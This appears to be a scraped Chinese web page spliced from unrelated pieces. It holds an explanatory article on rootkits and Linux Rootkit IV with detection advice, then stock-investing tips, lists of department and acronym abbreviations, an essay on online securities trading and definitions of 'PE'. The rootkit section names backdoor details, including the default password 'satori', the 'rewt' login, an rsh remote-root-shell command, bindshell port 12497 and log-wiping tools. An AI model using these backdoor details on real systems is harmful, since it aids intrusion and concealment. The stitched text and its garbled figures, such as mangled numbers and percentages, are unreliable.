今日实时汇率
1 美元(USD)=
7.3033 人民币(CNY)
反向汇率:1 CNY = 0.1369 USD
更新时间:2024-12-24 08:02:32
rootkit在网络安全中经常会遇到rootkit,NSA安全和入侵检测术语字典( NSA Glossary of Terms Used in Security and Intrusion Detection)对rootkit的定义如下:A hacker security tool that captures passwords and message traffic to and from a computer A collection of tools that allows a hacker to provide a backdoor into a system, collect information on other systems on the network,mask the fact that the system is compromised, and much more Rootkit is a classic example of Trojan Horse software Rootkit is available for a wide range of operating systems 好多人有一个误解,他们认为rootkit是用作获得
系统root访问权限的工具。实际上,rootkit是攻击者用来隐藏自己的踪迹和保留root访问权限的工具。通常,攻击者通过远程攻击获得root访问权限,或者首先密码猜测或者密码强制破译的方式获得
系统的访问权限。进入
系统后,
如果他还没有获得root权限,再通过某些安全漏洞获得
系统的root权限。接着,攻击者会在侵入的主机中安装rootkit,然后他将经常通过rootkit的后门检查
系统是否有其他的用户登录,
如果只有自己,攻击者就开始着手清理日志中的有关信息。通过rootkit的嗅探器获得其它系统的用户和密码之后,攻击者就会利用这些信息侵入其它的系统。 什么是rootkit Rootkit出现于二十世纪90年代初,在1994年2月的一篇安全咨询报告中首先使用了rootkit这个名词。这篇安全咨询就是CERT-CC的CA-1994-01,题目是Ongoing Network Monitoring Attacks,最新的修订时间是1997年9月19日。从出现至今,rootkit的技术发展非常迅速,应用越来越广泛,检测难度也越来越大。其中针对SunOS和Linux两种操作系统的rootkit最多(树大招风:P)。所有的rootkit基本上都是由几个独立的
程序组成的,一个典型rootkit包括: 以太网嗅探器程
程序,用于获得网络上传输的用户名和密码等信息。 特洛伊木马
程序,例如:inetd或者login,为攻击者提供后门。 隐藏攻击者的目录和进程的
程序,例如:ps、netstat、rshd和ls等。 可能还包括一些日志清理工具,例如:zap、zap2或者z2,攻击者使用这些清理工具删除wtmp、utmp和lastlog等日志文件中有关自己行踪的条目。 一些复杂的rootkit还可以向攻击者提供telnet、shell和finger等服务。 还包括一些用来清理/var/log和/var/adm目录中其它文件的一些脚本。 攻击者使用rootkit中的相关
程序替代系统原来的ps、ls、netstat和df等程序,使系统管理员无法通过这些工具发现自己的踪迹。接着使用日志清理工具清理系统日志,消除自己的踪迹。然后,攻击者会经常地通过安装的后门进入系统查看嗅探器的日志,以发起其它的攻击。
如果攻击者能够正确地安装rootkit并合理地清理了日志文件,系统管理员就会很难察觉系统已经被侵入,直到某一天其它系统的管理员和他联系或者嗅探器的日志把磁盘全部填满,他才会察觉已经大祸临头了。但是,大多数攻击者在清理系统日志时不是非常小心或者干脆把系统日志全部删除了事,警觉的系统管理员可以根据这些异常情况判断出系统被侵入。不过,在系统恢复和清理过程中,大多数常用的命令例如ps、df和ls已经不可信了。许多rootkit中有一个叫做FIX的程序,在安装rootkit之前,攻击者可以首先使用这个程序做一个系统二进制代码的快照,然后再安装替代程序。FIX能够根据原来的程序伪造替代程序的三个时间戳(atime、ctime、mtime)、date、permission、所属用户和所属用户组。
如果攻击者能够准确地使用这些优秀的应用程序,并且在安装rootkit时行为谨慎,就会让系统管理员很难发现。 LINUX ROOTKIT IV 前面说过,大部分rootkit是针对Linux和SunOS的,下面我们介绍一个非常典型的针对Linux系统的rootkit--Linux Rootkit IV。Linux Rootkit IV是一个开放源码的rootkit,是Lord Somer编写的,于1998年11月发布。不过,它不是第一个Linux Rootkit,在它之前有lrk、lnrk、lrk2和lrk3等Linux Rootkit。这些rootkit包括常用的rootkit组件,例如嗅探器、日志编辑/删除工具、和后门程序的。 经过这么多年的发展,Linux Rootkit IV功能变的越来越完善,具有的特征也越来越多。不过,虽然它的代码非常庞大,却非常易于安装和使用,只要执行make install就可以成功安装。
如果你还要安装一个shadow工具,只要执行make shadow install就可以了。注意:Linux Rootkit IV只能用于Linux 2x的内核。下面我们简单地介绍一下Linux Rootkit IV包含的各种工具,详细的介绍请参考其发布包的README文件。 隐藏入侵者行踪的程序 为了隐藏入侵者的行踪,Linux Rootkit IV的作者可谓煞费心机,编写了许多系统命令的替代程序,使用这些程序代替原由的系统命令,来隐藏入侵者的行踪。这些程序包括: ls、find、du 这些程序会阻止显示入侵者的文件以及计算入侵者文件占用的空间。在编译之前,入侵者可以通过ROOTKIT_FILES_FILE设置自己的文件所处的位置,默认是/dev/ptyr。注意如果在编译时使用了SHOWFLAG选项,就可以使用ls -/命令列出所有的文件。这几个程序还能够自动隐藏所有名字为:ptyr、hackdir和W4r3z的文件。 ps、top、pidof 这几个程序用来隐藏所有和入侵者相关的进程。 netstat 隐藏出/入指定IP地址或者端口的网络数据流量。 killall 不会杀死被入侵者隐藏的进程。 ifconfig 如果入侵者启动了嗅探器,这个程序就阻止PROMISC标记的显示,使系统管理员难以发现网络接口已经处于混杂模式下。 crontab 隐藏有关攻击者的crontab条目。 tcpd 阻止向日志中记录某些连接 syslogd 过滤掉日志中的某些连接信息 木马程序 为本地用户提供后门,包括: chfn 提升本地普通用户权限的程序。运行chfn,在它提示输入新的用户名时,如果用户输入rookit密码,他的权限就被提升为root。默认的rootkit密码是satori。 chsh 也是一个提升本地用户权限的程序。运行chsh,在它提示输入新的shell时,如果用户输入rootkit密码,他的权限就被提升为root。 passwd 和上面两个程序的作用相同。在提示你输入新密码时,如果输入rookit密码,权限就可以变成root。 login 允许使用任何帐户通过rootkit密码登录。如果使用root帐户登录被拒绝,可以尝试一下rewt。当使用后门时,这个程序还能够禁止记录命令的历史记录。 木马网络监控程序 这些程序为远程用户提供后门,可以向远程用户提供inetd、rsh、ssh等服务,具体因版本而异。随着版本的升级,Linux Rootkit IV的功能也越来越强大,特征也越来越丰富。一般包括如下网络服务程序: inetd 特洛伊inetd程序,为攻击者提供远程访问服务。 rshd 为攻击者提供远程shell服务。攻击者使用rsh -l rootkitpassword host command命令就可以启动一个远程root shell。 sshd 为攻击者提供ssh服务的后门程序。 工具程序 所有不属于以上类型的程序都可以归如这个类型,它们实现一些诸如:日志清理、报文嗅探以及远程shell的端口绑定等功能,包括: fix 文件属性伪造程序 linsniffer 报文嗅探器程序。 sniffchk 一个简单的bash shell脚本,检查系统中是否正有一个嗅探器在运行。 wtedwtmp/utmp日志编辑程序。你可以使用这个工具编辑所有wtmp或者utmp类型的文件。z2 utmp/wtmp/lastlog日志清理工具。可以删除utmp/wtmp/lastlog日志文件中有关某个用户名的所有条目。不过,如果用于Linux系统需要手工修改其源代码,设置日志文件的位置。 bindshell rootkit在某个端口上绑定shell服务,默认端口是12497。为远程攻击者提供shell服务。 如何发现rootkit 很显然,只有使你的网络非常安装让攻击者无隙可乘,才能是自己的网络免受rootkit的影响。不过,恐怕没有人能够提供这个保证,但是在日常的网络管理维护中保持一些良好的习惯,能够在一定程度上减小由rootkit造成的损失,并及时发现rootkit的存在。 首先,不要在网络上使用明文传输密码,或者使用一次性密码。这样,即使你的系统已经被安装了rootkit,攻击者也无法通过网络监听,获得更多用户名和密码,从而避免入侵的蔓延。 使用Tripwire和aide等检测工具能够及时地帮助你发现攻击者的入侵,它们能够很好地提供系统完整性的检查。这类工具不同于其它的入侵检测工具,它们不是通过所谓的攻击特征码来检测入侵行为,而是监视和检查系统发生的变化。Tripwire首先使用特定的特征码函数为需要监视的系统文件和目录建立一个特征数据库,所谓特征码函数就是使用任意的文件作为输入,产生一个固定大小的数据(特征码)的函数。入侵者如果对文件进行了修改,即使文件大小不变,也会破坏文件的特征码。利用这个数据库,Tripwire可以很容易地发现系统的变化。而且文件的特征码几乎是不可能伪造的,系统的任何变化都逃不过Tripwire的监视(当然,前提是你已经针对自己的系统做了准确的配置:P,关于Tripwire和aide的使用请参考本站的相关文章)。最后,需要能够把这个特征码数据库放到安全的地方。财务部门的英语缩写?会计英文缩写?出纳英文缩写?首先说说炒股这词实在不妥,正确地说,应该是投资股票 说几句题外话:想先解释一下炒股的"炒"字。 经查字典,炒字之义, 1是一种烹饪方法。把食物置锅内,以少量的油略为翻搅至熟者。如:炒三鲜。 2争闹。通吵。例如元˙乔吉˙金钱记˙第一折:闹炒炒嫩绿草聒鸣蛙,轻丝丝淡 黄柳带栖鸦。 股市投资,怎麼刚一开始就使用"炒股"这一词,不但语焉不详,而且语带不祥。如果股市如油锅,投资人进去几经翻搅,炒酥了、炒糊了、炒爆了,似乎都不好。很有下地狱炸油锅的味道。 再说,上股市投资被称为"争闹"也不像话。 咱们中文是雍容华贵的,应该可以选用温厚庄重的字词,至少可选用中性的、不带贬抑、歧视的字眼。例如说投资股市就很中性。不要像香港的中文,许多名词用了歪字,整个社会文化气息就显得浮薄许多。你看雅虎香港< 首页-商业与经济-金融与投资/hkdiryahoocom/Business_and_Economy/Finance_and_Investment/>封面页就写"拓展中国内地商机 - 提供中国内地商业与经济发展的行情资料,助您建立投机策略。"竟连个鼓励投资的字眼都没,真是够了! 本来股民将资金注入股市,是活络资本市场,很健康、很有良性循环的意味。如今不论谁进场都叫炒股,实是轻贱、贬低、污名化了投资行为。好比邻居王大娘买完菜顺便上号子看看行情,就说她是"操盘"、"操作股票",一样可笑。说她去炒股,更是带有鄙视的意味。 当然也有许多完全没有资本市场运作概念的化外之民,轻易也可以注资股市买卖股票,或赚或赔各凭天命。但投资人教育本来就是国家政府、证券公司的责任。你看上海证交所就有投资者教育中心的设置(/wwwssecomcn/sseportal/ps/zhs/fwzc/tzzjyshtml)。政府既然鼓励人民来市,股民就不应使用轻贱字眼、歧视眼光看待。本人建议就使用"投资"二字。 除非是学术性文章,也不要轻用投机二字。英文中使用speculation一词本来并无价值判断的意涵,凡买卖事物意在谋取差价利益者,都是speculation 。可中文说某人投机,跟投机倒把一样,带有浓厚的价值色彩。意指以买空卖空,套购转卖等欺诈手段获取暴利。炒股一词,义近乎此! 以上只是发发牢骚,看官不必多虑。没事! 如果阁下是想投资股票,步骤是 1携带身分证到证券公司开户,这样子以后你才有一个买卖下单的窗口。 2证券公司护要求你到一家指定银行开户,这是为了方便(买股)代扣(卖股)代收股款用的。 3在第一步骤中找一位认真一点的接单营业员。看不顺眼就当场要求换人。这个人将来必须对你提供所有的市场资讯,如果一开始找个懒散的,你将无休无止地痛苦。 4你得有一笔小钱,至少足够买第一张股票。 5等行情来就开始买卖。一般说来先看成交量,指数大跌且成交量降到均量一半以下时,买进风险很低,这叫九生一死,此时买股赔钱风险只有10%。反之,指数上涨且成交量降到均量一半以下时,买进风险很高,这叫九死一生,此时买股赔钱风险高达90%。大抵状况如此。细部状况可以跟营业员请教。 6别贪。可以不停利,但一定要设停损。就是输钱到20%(或25%,自己订一个标准),一定要砍仓。20几年来我在市场看过多少赔大钱的人,都是因为没有停损。只要有停损观念,永远能东山再起。如果没有停损观念,或订了停损点但没有认真执行,很可能一次栽跟头就把你打出股市20年,永无翻身之日这句话,你先记著,20年后再说我是不是危言耸听! 7赚到钱一定要做些善事,然后忘了这些事!为祖国许多赤贫同胞做点贡献,积些阴德。 建议您先看看《24本股票期货书籍》 /libverycdcom/2005/03/03/0000040980html 以及/softtlwcn/gp/ 掌握股票证券、股票数据、股票知识、股票分析、股票入门知识之后,咱们再来研究。 开户程序如下:首先凭身份证到当地的证券登记公司(有的券商也代办)办理一个沪深交易所的股东账户卡,选择一家证券营业部开户,签订一份合同,领取资金账户卡,存入一定现金(支票)。 买卖股票程序如下: 买卖股票时必须指明买进或卖出,买卖股票的名称(或代码)、数量、价格。并且这一委托只在下达委托的当日有效。委托的内容包括你要买卖股票的简称(代码),数量及买进或卖出股票的价格。股票的简称通常为四至三个汉字,股票的代码为六位数,委托买卖时股票的代码和简称一定要一致。同时,买卖股票的数量也有一定的规定:即委托买人股票的数量必须是100的整倍数,但委托卖出股票的数量则可以不是100的整倍(零头数以零股交易处理)。 委托的方式有四种:柜台递单委托、电话自动委托、电脑自动委托和远程终端委托。 至於以后您每天想查看股市行情 上海交易所上市的股票看这儿/wwwssecomcn/sseportal/webapp/datapresent/SSEQueryFirstSSENewAct 深圳交易所上市的股票看这儿 /wwwszsecn/main/marketdata/Catalog_1110aspx 如果想当专业的股市做手 那得多懂一些技术分析 我推荐您一个网址 /wwwangelibrarycom/economic/gsjs/ 如果想知道股市大师们的操作秘诀 那得懂很多操盘技巧 我再推荐您一个网址 /wwwyunerorg/blogviewasplogID=58 敬祝您早一点成为亿万富翁 最后奉劝一句,任何投资、每一次、每一笔的投资 一定、务必、千万千万要设停损 !留得青山在,不怕没柴烧。 切记!切记网络证券的含义财务部门的英语缩写?会计英文缩写?出纳英文缩写? 财务部:Financial Department -- FD 会计:aountant 出纳:cashier 英文缩写: 当天统计 英文缩写是? 月统计 英文缩写是? 没有缩写,也不需缩写,本来就不长: 当天统计:daily subtotal 月统计 monthly total 各个部门的英文缩写? 总经理办公室 GM office 食堂 dining room 法务审计部 legal and audit department 资讯部 Information department 仓库 warehouse 产品开发部 product develope department 国际事务部 international business affairs cGMP专案组 cGMP project team 公司部门的英文缩写? 总公司 Head Office 分公司 Branch Office 营业部 Business Office 人事部 Personnel Department 人力资源部 Human Resources Department 总务部 General Affairs Department 财务部 General Aounting Department 销售部 Sales Department 促销部 Sales Promotion Department 国际部 International Department 出口部 Export Department 进口部 Import Department 公共关系 Public Relations Department 广告部 Advertising Department 企划部 Planning Department 产品开发部 Product Development Department 研发部 Research and Development Department(R&D) 秘书室 Secretarial Pool 采购部 Purchasing Department 工程部 Engineering Department 行政部 Admin Department 人力资源部 HR Department 市场部 Marketing Department 技术部 Technolog Department 客服部 Service Department 行政部: Administration 财务部 Financial Department 总经理室、Direcotor, or President 副总经理室、Deputy Director, or Vice president 总经办、General Deparment 采购部、Purchase & Order Department 工程部、Engineering Deparment 研发部、Research Deparment 生产部、Productive Department 销售部、Sales Deparment 广东业务部、GD Branch Deparment 无线事业部、Wireless Industry Department 拓展部 Business Expending Department 物供部、Supply Department B&D business and development 业务拓展部 Marketing 市场部 Sales 销售部 HR 人力资源部 Aount 会计部 PR people relationship 公共关系部 OFC (Office, 但不常见) / OMB = Office of Management and Budget 办公室 Finance 财务部 MKTG (Marketing) 市场部 R&D (Research & Development) 研发部 MFG (Manufacturing) 产品部 Administration Dept 管理部 Purchasing Dept 采购部 Chairman/President Office Gerneral Manager office or GM office 总经理办公室 Monitor & Support Department 监事会 Strategy Research 战略研究部 财务的英文缩写 finance financial affairs financing 财务部在部门的英文缩写是什么? 比如工程部是PD finance department = FD 财务部的英文缩写是什么呀 Financial Department:FD或者 Financial Affairs Department:FAD 英文缩写 A股 —人民币普通股票 AA制 —平摊聚餐费 AB角 —担任一个角色的两个演员 ABS —制动防抱着死装置 ADSL —非对称数字使用者线路 宽频 AIDS —艾滋病 AM —调幅 APC —阿司匹林 APEC —亚太经济合作组织 API —空气污染指数 ATM机—自动柜员机 a粒子—阿尔法粒子 a射线—阿尔法射线 B超 —B型超声诊断(仪) B股 —以美元或港币交易的股票 B细胞或B淋巴细胞—一种免疫细胞 BBS —电子公告牌系统 BP机 —无限寻呼机 BIAS —乖离率 b粒子—贝塔粒子 CAD —计算机辅助设计 CBD —商业中心 CCO —首席文化官 CD —镭射唱盘 CDMA —码头多址 CD-R—可录光碟 CD-ROM—只读光碟 CD-RW —可擦写光碟 CEO —执行长 CFO —首席财务官 CGO —首席沟通官 CI —企业标识 C3I系统—军队指战员指挥系统 CIMS —计算机整合制造系统 CIO —资讯长 CIP —在版编目;预编目录 C4ISR —军队自动化指挥系统 COO —营运长 CPA —注册会计师 CPU —中央处理器 CT —计算机体层成像(仪) CTO —首席技术官 DELL —戴尔 DIY —自己动手做 DNA 脱氧核糖核酸 DNA晶片—基因晶片 DOS —磁碟作业系统 DSL —数字使用者线路 DVD —数字镭射唱盘 e 化 —电子化 ED —男子性功能障碍 EDI —电子资料交换 E-mail—电子邮件 EMS —邮政特快专递 EQ —情商 FA —工厂自动化 FAX —传真件 FM —调频 GDP —国内生产总值 GIS —地理资讯系统 GMDSS —全球海上遇险情与安全系统 GNP —国民生产总值 GPS —全球定位系统 GRE —美国等国家研究生入学资格考试 GSM —全球移动通讯系统 H股 —在香港上市的股票 HA —家庭自动化 HDTV —高清晰度电视 hi-fi —高保真度 HIV —在艾滋病病毒 HSK —汉语水平考试 IC卡 —积体电路卡 ICP —因特网资讯提供商 ICQ —网路寻呼机 ICU —重病监护病房 IDC —网际网路资料中心 inter—网际网路 Intnr—因特网 IOC —国际奥林匹克委员会 IP地址 —网际协议地址 IP电话 —网路电话 IP卡 —IP电话卡 IQ —智商 ISDN —综合业务数字网络 ISO —国际标准化组织 ISP —因特网服务提供商 IT —资讯科技 ITS —智慧交通系统 KTV —配有卡拉OK和电视装置的包间 KDJ —随机指数 LD —镭射视盘 MACD —平滑异同移动平均线 MBA —工商管理硕士 MD —迷你光碟 MP3 —一种常用的数字音讯压缩格式 MPA —公共管理硕士 MTO —多边贸易组织 MTV —一种用电视画面配合歌曲演唱的艺术形式 NC —网路计算机 NMD —国家导弹预防系统 OA —办公自动化 OAPEC —阿拉伯石油输出国组织 OCR —光学字元识别 OEM —原始装置制造商业 OPEC —石油输出国组织(欧佩克) PC机 —个人电子计算机 PDA —个人数字助理 pH值 —氢离子浓度指数 PICC —中国人民保险公司 POS机 —商场电子收款机 PPA —苯丙醇胺 某些感冒药和减肥药中的一种成 分,已被国家通告停用。 PT —特别转让 QC —质量管理 RAM —随机存取储存器 RMB —人民币 ROM —储存器 RSI —相对强弱指数 SBS —大楼综合症 SCI —科学引文缩引 SIM卡 —使用者身份识别卡 SOHO —小型家居办公室 SOS —紧急呼救讯号 SOS儿童村—一种专门收养孤儿的慈善机构 ST —特别处理 STD —性传播疾病 T细胞 —一种免疫细胞 T型台 —多用于时装表演的舞台 T恤衫 —一种短袖套头上衣服 Tel —电话 TMD —战区导弹防疫系统 TV —电视 UFO —不明飞行物 VCD —镭射视盘 VDR —光碟录影机 VIP —要人 贵宾 VOD —视讯点播 WAR —无线应用协议 WC —盥洗室 厕所 WHO —世界卫生组织 WTO —世界贸易组织 —全球资讯网 X刀 —一种用于放射治疗的装置 X光 —X射线 X射线 —波长很短的电磁波,有很大的穿透能力。 y射线— 伽马射线 y刀 — 伽马刀PE是做什么的?问题1:什么是网络证券? 问题2:网络证券是什么意思? 网上证券是电子商务条件下的证券业务的创新,网上证券服务是证券业以因特网等信息网络为媒介,为客户提供的一种全新商业服务。网上证券包括有偿证券投资资讯(国内外经济信息、政府政策、证券行情)、网上证券投资顾问、股票网上发行、买卖与推广等多种投资理财服务。 网络证券的发展趋势 随着网上证券业务的不断推广,证券市场将逐渐地从“有形”的市场过渡到“无形”的市场,现在的证券交易营业大厅将会逐渐失去其原有的功能,远程终端交易、网上交易将会成为未来证券交易方式的主流。网上证券对未来证券市场发展的影响主要表现在如下方面: (1).证券市场的发展速度加快 证券市场是一个快速多变、充满朝气的市场。在证券市场发展过程中,网上证券作为证券市场创新的一种新形式,发挥了积极的推动作用。其表现是:第一,证券市场的品种创新和交易结算方式的变革,为网上证券建设提出了新的需求;第二,网上证券建设又为证券市场的发展创新提供了技术和管理方面的支持,两者在相互依存、相互促进的过程中得到了快速发展。 (2).证券业的经营理念在实践中发生了变化 未来的证券公司将不再以雄伟气派的建筑为标志,富丽堂皇的营业大厅不再是实力的象征,靠铺摊设点扩张规模已显得黯然失色。取而代之的是,依托最新的电子化成果,积极为客户提供投资咨询、代人理财等金融服务,发展与企业并购重组、推荐上市、境内外直接融资等有关的投资银行业务,努力建立和拓展庞大的客户群体将成为其主营目标。 (3).证券业的营销方式在管理创新中不断地变化 未来的证券公司的市场营销将不再依赖于营销人员的四面出击,而将集中更多的精力用于网络营销。通过网络了解客户的需求,并根据客户的需求确定营销的策略和方式,再将自己的优势和能够提供的服务通过网络反馈给客户,从而达到宣传自己、推销自己的目的。 (4).证券业的经营策略发生了变化 在未来网络互联、信息共享的信息社会里,证券公司将不再单纯依靠自身力量来发展业务,而是利用自身优势建立与银行、邮电等行业的合作关系。各行业在优势互补、互惠互利的前提下联手为客户提供全方位、多层次的立体交叉服务。这种合作会给各方带来成本的降低和客源的增加,从而达到增收节支、扩大业务的目的。 (5).金融业中介人的地位面临严重的挑战 在未来网络互联、信息共享的时代,企业可绕过证券金融机构,直接通过互联网公开发行股票来募集资金,甚至自己开展交易活动,如美国电子股票信息公司自 1996年开始利用互联网为客户提供股票交易服务;又如美国春街啤酒厂(Spring Street),作为全球第一个在互联网上发行股票的公司,直接在网络上向3500个投资者募集的160万美元资本,并在网络上发展一套交易制度来交易该公司股票。该公司还进一步计划成立一个网络投资银行,专门做网络上公开发行的股票交易业务。在网络技术迅速发展的今天,金融机构如果无法适应网络技术的发展,无疑将成为最大的输家,很可能成为明日的“恐龙”。 (6)大规模网上交易的条件日渐成熟 首先是技术的进步,从技术角度讲,网上交易已可以使投资者在时间上领先一步。其次,我国的互联网用户群已呈现几何级数增长势头。三是我国证券市场正日趋成熟。 (7)集中式网上交易成为一种发展趋势 我国证券行业正在向集中交易、集中清算、集中管理以及规模化和集团化的经营方式转换。网上交易采用这一经营模式,更有利于整合券商的资源,实现资源共享,节约交易成本与管理费用,增强监管和风险控制能力。可见,集中式网上交易模式符合未来券商经营模式的发展方向。 (8)网上经纪与全方位服务融合 在固定佣金政策的大背景下,使得国内券商提前从价格竞争进入了服务竞争阶段。通常情况下,这一竞争阶段应该是在充分的价格竞争之后到来。价格竞争的直接结果是导致网上交易佣金费率的降低,当竞争达到一定程度后,仅靠减佣模式已不能维持下去时,全方位服务模式就会出现。这时候,券商的收入将由单一的经纪佣金转向综合性的资产管理费用。 (9)速度问题将会得到解决 在今后几年里,宽带网会获得突破性发展。基于有线电视的CableModem技术、基于普通电话线路的DSL技术以及基于卫星通信的DirecPC技术等典型宽带技术的发展,将使电信能提供逼近于零时延、零接入、零故障的服务。而基于IP协议的交换技术的发展,又将使传统电信业务和网络数据业务的综合统一成为可能。由于互联网协议(TCP/IP)是电信网、有线电视网、计算机网可以共同接受的协议,因此,未来的宽带网实质上就是宽带互联网的代名词。 (10)网上证券交易正在进入移动交易时代 WAP(无线应用协议)为互联网和无线设备之间建立了全球统一的开放标准,是未来无线信息技术发展的主流。 WAP技术可以使股票交易更方便,通过WAP可实现多种终端的服务共享和信息交流,包容目前广泛使用的和新兴的终端类型,如手机、呼机、PDA等设备。用户通过手机对券商收发各种格式的数据报告来完成委托、撤单、转帐等全部交易手续。由此可见,未来几年基于互联网的移动证券交易市场将有巨大的发展空间。 (11)网上证券交易实现方式趋向于多元化 据资料显示,目前中国家庭拥有计算机的比例还很低,但电话、电视机,传呼机和手机的拥有量却很高,截止 2001年7月底,我国手机用户已达到1206亿部,超过美国最新统计的1201亿户,位居世界第一。因此,突破Web+PC的网上交易模式,使投资者可以借助电脑、手机、双向寻呼机、机顶盒、手提式电子设备等多种信息终端进行网上证券交易,这是中国网上证券交易发展的必然方向。 (12)网上证券交易将以更快的速度向农村和偏远地区发展 目前我国大多数县、县级市都没有证券营业部,投资者买卖股票需要到地级市,非常不方便。特别是在广东、江浙一带,许多县、镇经济发达,比如在广东南海县,一个县就有500台ATM提款机,却没有一家证券营业部。网上交易的普及,交易网络的无限延伸,将使占中国85%以上的小城市和农村居民变成潜在的股民,使很多没有条件进行股票买卖的人加入到股民的队伍中来。 (13)中国网上证券交易即将面临大突破 加入WTO后,中国证券市场将变成全球证券市场的一部分,中国的股市会完全国际化,国际上的一些大券商会想方设法进入中国市场。他们不可能一家一家地开设营业厅,其策略一定是在网上,这必将促进网上证券业的发展。另外,根据美国的经验,网上证券交易量一旦超过 10%,就会有一个大的突破,中国1999年整个网上交易量不到1%,去年是3%~5%,今年预计会在5%~10%左右。也就是说,近几年内我国网上证券交易即将进入最快的发展时期。木马是什么东西PE开放分类: 股票、塑料、职务、高分子有机化合物目录 • PRICE / EARNING PER SHARE • 产品/项目工程 • PE工程师 • 私人股权投资基金 • Polyethylene • Windows PE • Windows PE的作用 PRICE / EARNING PER SHAREPE = PRICE / EARNING PER SHAREPE是指股票的本益比,也称为“利润收益率”。本益比是某种股票普通股每股市价与每股盈利的比率。所以它也称为股价收益比率或市价盈利比率(
市盈率)
市盈率PE分为静态
市盈率PE和动态
市盈率PE:静态PE=股价/每股收益(EPS)(年) 动态PE=股价总股本/下一年净利润(需要自己预测)
市盈率把股价和利润连系起来,反映了企业的近期表现。如果股价上升,但利润没有变化,甚至下降,则市盈率将会上升。一般来说,市盈率水平为:0-13 - 即价值被低估14-20 - 即正常水平21-28 - 即价值被高估28+ - 反映股市出现投机性泡沫股市的市盈率股息收益率上市公司通常会把部份盈利派发给股东作为股息。上一年度的每股股息除以股票现价,是为现行股息收益率。如果股价为50元,去年股息为每股5元,则股息收益率为10%,此数字一般来说属于偏高,反映市盈率偏低,股票价值被低估。一般来说,市盈率极高(如大于100倍)的股票,其股息收益率为零。因为当市盈率大于100倍,表示投资者要超过100年的时间才能回本,股票价值被高估,没有股息派发。一、怎样计算PE PE(市盈率)是一间公司股票的每股市价与每股盈利的比率。其计算公式如下:市盈率 =每股市价/每股盈利目前,几家大的证券报刊在每日股市行情报表中都附有市盈率指标,其计算方法为:市盈率 =每股收市价格/上一年每股税后利润对于因送红股、公积金转增股本、配股造成股本总数比上一年年末数增加的公司,其每股税后利润按变动后的股本总数予以相应的摊薄。以东大阿派为例,公司1998年每股税后利润060元,1999年4月实施每10股转3股的公积金转增方案,6月30日收市价为4300元,则市盈率为43/060/(1+03)=9317(倍) 公司行业地位、市场前景、财务状况。 以市盈率为股票定价,需要引入一个"标准市盈率"进行对比--以银行利率折算出来的市盈率。在1999年6月第七次降息后,我国目前一年期定期存款利率为225%,也就是说,投资100元,一年的收益为225元,按市盈率公式计算:100/225(收益)=4444(倍) 如果说购买股票纯粹是为了获取红利,而公司的业绩一直保持不变,则股利的收适应症与利息收入具有同样意义,对于投资者来说,是把钱存入银行,还是购买股票,首先取决于谁的投资收益率高。因此,当股票市盈率低于银行利率折算出的标准市盈率,资金就会用于购买股票,反之,则资金流向银行存款,这就是最简单、直观的市盈率定价分析。二、正确看待市盈率指标 在股票市场中,当人们完全套用市盈率指标去衡量股票价格的时候,会发现市场变得无法理喻:股票的市盈率相差悬殊,并没有向银行利率看齐;市盈率越高的股票,其市场表现越好。是市盈率指标没有实际应用意义吗?其实不然,这只是投资者没能正确把握对市盈率指标的理解和应用而已。1市盈率指标对市场具有整体性的指导意义 市场的资金永远向收益率高的地方流动,就股票市场的整体平均市盈率而言,基本上是与银行利率水平看齐的。在降息以前,我国股市平均市盈率达到35-40倍就显得偏高了,而经过7次降息后,股市平均市盈率上升至40倍,则被视为"恢复性"的上涨。2衡量市盈率指标要考虑股票市场的特性。 与银行储蓄相比,股票市场具有高风险、高收益的特征。股票投资的收益,除了股息收入外,还存在买卖价差产生的损益。股票定价适当高于银行存款标准,体现了风险与收益成正比的原则。3以动态眼光看待市盈率 市盈率指标计算以公司上一年的盈利水平为依据,其最大的缺陷在于忽略了对公司未来盈利状况的预测。从单个公司来看,市盈率指标对业绩较稳定的公用事业、商业类公司参考较大,但对业绩不稳定的公司,则易产生判断偏差。以上面提到的东大阿派为例,由于公司市场前景广阔,具有很高的成长性,受到投资者的追捧,股价上升,市盈率居高不下,但以公司每年80%的利润增长速度,以现价购入,一年后的市盈率已经大幅下降;相反,一些身处夕阳产业的上市公司,目前市盈率低到20倍左右,但公司经营状况不佳,利润呈滑坡趋势,以现价购入,一年后的市盈率可就奇高无比了。 市盈率高,在一定程度上反映了投资者对公司增长潜力的认同,不仅在中国股市如此,在欧美、香港成熟的投票市场上同样如此。从这个角度去看,投资者就不难理解为什么高科技板块的股票市盈率接近或超过100倍,而摩托车制造、钢铁行业的股票市盈率只有20倍了。当然,这并不是说股票的市盈率越高就越好,我国股市尚处于初级阶段,庄家肆意拉抬股价,造成市盈率奇高,市场风险巨大的现象时有发生,投资者应该从公司背景、基本素质等方面多加分析,对市盈率水平进行合理判断。----------------------------------------------------------产品/项目工程PE 是一个工种,英文是product Engineering 产品工程, 但也有人翻译成project Engineering项目工程product Engineering 产品工程,是技术员,就叫PE技术员;是工程师,就叫PE工程师。这个职位在工厂里主要是解决生产过程中出现的问题,及做作业指导书。属于职位比较低级的。project Engineering项目工程。是专对某个产品,进行统筹,及专案管理。往往在公司中的级别较高。------------------------------------------------------------PE工程师有一些主要的职责如:新产品的导入、试产的安排、生产指导,现场异常问题的及时排除(遇到异常立即有临时对策),生产工艺的改善、产品性能及结构方面的改善、包括工艺指导书的编写等。总之PE工程师对于生产具有绝对的权威性。相当于工程技术的工程师——PE的侧重点是现场的生产PE须对生产工艺、产品性能、结构十分的了解。可以说在一个工厂中对生产最熟悉的人就是PE,作到生产中任何事情都在PE的掌握中不过现在也有了PIE工程师做PE与IE相结合的事情。。。----------------------------------------------------------私人股权投资基金PE是Private Equity Fund的缩写,俗称私人股权投资基金。它和私募证券投资基金不同的是,PE主要是指定向募集、投资于未公开上市公司股权的投资基金,也有少部分PE投资于上市公司股权。“私人股权”(Private Equity)所指原非“私募”,与基金筹集方式并无关系。这类基金之所以得名,正是因其主要投资于私人股权(Private Equity)也就是非上市公司股权------------------------------------------------------------------------------------------PolyethylenePE,全名为Polyethylene,是最结构简单的高分子有机化合物,当今世界应用最广泛的高分子材料,由乙烯聚合而成,根据密度的不同分为高密度聚乙烯、中密度聚乙烯和低密度聚乙烯。低密度聚乙烯较软,多用高压聚合;高密度聚乙烯具有刚性、硬度和机械强度大的特性,多用低压聚合。高密度聚乙烯可以做容器、管道,也可以做高频的电绝缘材料,用于雷达和电视。大量使用的常为低密度(高压)聚乙烯。聚乙烯为蜡状,有蜡一样的光滑感,不染色时,低密度聚乙烯透明,而高密度聚乙烯不透明,聚乙烯是通过乙烯( CH2=CH2 